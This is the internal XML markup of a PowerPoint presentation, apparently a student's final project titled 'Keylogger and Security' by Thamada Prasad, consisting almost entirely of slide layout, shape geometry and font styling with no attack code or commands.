            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="1287C2"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="158" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1695450" cy="16192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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="9732656" y="5883275"/>
            <a:ext cx="1143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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="2572278" y="5883275"/>
            <a:ext cx="708417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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="10951855" y="5883275"/>
            <a:ext cx="551167"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&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" spc="1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5941713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68531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4658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2967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13572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0100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069814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53589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14175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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150812" y="0"/>
            <a:ext cx="2436812" cy="6858000"/>
            <a:chOff x="150812" y="0"/>
            <a:chExt cx="2436812" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="457200" y="0"/>
              <a:ext cx="1122362" cy="5329238"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="21426"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4766" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16711" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21426"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="150812" y="0"/>
              <a:ext cx="1117600" cy="5276850"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="21600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16721" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4817" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1228724" cy="1619250"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20651" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="262626"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="457200" y="5291137"/>
              <a:ext cx="1495424" cy="1566863"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20843" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0C5B82"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="457200" y="5286375"/>
              <a:ext cx="2130424" cy="1571624"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="0" y="65"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="15161" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2510" y="589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="65"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1287C2"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1695450" cy="1619250"/>
            </a:xfrm>
            <a:custGeom>
              <a:gdLst>
                <a:gd name="T1" fmla="*/ 0 w 21600"/>
                <a:gd name="T2" fmla="*/ 0 h 21600"/>
                <a:gd name="T3" fmla="*/ 21600 w 21600"/>
                <a:gd name="T4" fmla="*/ 21600 h 21600"/>
              </a:gdLst>
              <a:rect l="T1" t="T2" r="T3" b="T4"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="21600" y="21600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3721" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114" y="571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175" y="571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175" y="508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114" y="508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15653" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:ln cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1484311" y="685800"/>
            <a:ext cx="10018713" cy="175259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10" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1484310" y="2666999"/>
            <a:ext cx="10018713" cy="3124201"/>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dt" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9732656" y="5883275"/>
            <a:ext cx="11430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Corbel" pitchFamily="0" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>6/24/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2572278" y="5883275"/>
            <a:ext cx="7084177"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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5883275"/>
            <a:ext cx="551167"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&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" spc="1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91506004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ctr" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4000" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="285750" indent="-285750" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>
        </a:buClr>
        <a:buSzPct val="145000"/>
        <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2400" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>
        </a:buClr>
        <a:buSzPct val="145000"/>
        <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2000" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1200150" indent="-285750" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>
        </a:buClr>
        <a:buSzPct val="145000"/>
        <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1543050" indent="-171450" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>
        </a:buClr>
        <a:buSzPct val="145000"/>
        <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2000250" indent="-171450" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>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5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>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6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>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7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>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8pPr>
      <a:lvl9pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1287C2"/>
        </a:buClr>
        <a:buSzPct val="145000"/>
        <a:buFont typeface="Arial" pitchFamily="0" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1400" kern="1200" cap="none">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
          <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
          <a:cs typeface="Corbe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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1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5.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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.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2667000" y="1292634"/>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1943100" y="2461289"/>
            <a:ext cx="723900" cy="619125"/>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685800" y="3403288"/>
            <a:ext cx="8423972" cy="502284"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:prstTxWarp prst="textNoShape"/>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>                  Thamada Prasad</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="15" baseline="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10951855" y="5981383"/>
            <a:ext cx="551167"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华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4800600" y="4458113"/>
            <a:ext cx="6324600" cy="133113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800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" blurRad="50800" dir="2700000" dist="38100" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>FINAL PROJECT </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" blurRad="50800" dir="2700000" dist="38100" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" blurRad="50800" dir="2700000" dist="38100" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
                <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
                <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
              </a:rPr>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" blurRad="50800" dir="2700000" dist="38100" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6588327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381000" y="990600"/>
            <a:ext cx="10681335" cy="307776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Corbel" pitchFamily="0" charset="0"/>
